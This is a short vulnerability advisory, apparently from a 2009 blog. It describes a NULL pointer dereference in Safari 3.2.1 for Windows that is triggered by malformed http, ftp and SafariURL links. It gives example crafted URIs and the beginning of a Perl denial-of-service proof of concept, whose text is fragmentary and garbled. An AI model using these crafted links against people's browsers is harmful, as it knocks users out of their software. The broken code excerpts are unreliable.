Safari 3.2.1 for windows safariUrl protocol Handler abusse(null Deference)
original advisore:http://lostmon.blogspot.com/2009/01/
vendor notify:YES Exploit available: Private
This article is a "second" part of :
Safari for windows in prone vulnerable to a null pointer deference
in protocols handlers http, ftp and SafariURL.
The issue is triggered when a user in click a specially crafted link
with malformed uri that causess a NULL pointer derefence safari,
and will result in loss of availability for the browser.
In the case of SafariURL is very curious, because we can compose
a malformed url like SafariIRL://http://../ or ftp://../ and wen
try to open it whith safari,safari opens a new windows , and wen
we try to close this new one,clicking in the 'X' the window is
closed, but it reopens again ...
sO why it opens again in a infinite loop?
Take a look of posible source code of the fucnction.
in any place of the code before using a pointer,
it check that it is not equal to NULL:
Part of code affected
CFURLRef safariURL = nil;
OSStatus err = LSFindApplicationForInfo(kLSUnknownCreator,
CFSTR("com.apple.Safari"), nil, nil, &safariURL);if (err != noErr)
displayErrorAndQuit(@"Unable to locate Safari", @"Nightly builds of WebKit
require Safari to run. Please check that it is available and then try
NSBundle *safariBundle = [NSBundle bundleWithPath:[(NSURL *)safariURL
return safariBundle; }
Simple PoC
# !/usr/bin/perl
# Safari_httpDoSPoc.pl
# Safari for Windows 3.2.1 Remote http: uri handler DoS
# Lostmon [Lostmon@gmail.com ]
$archivo = $ARGV[0];
print "Uso: $0 This PoC is a malformed http ,safariurl and ftp URI, this causes that
safari for windowsSafari 3.2.1 for windows Browser Die PoC By Lostmon
lostmon@gmail.com) http://lostmon.blogspot.com
turn inestable and unresponsive.
Click THIS link.=>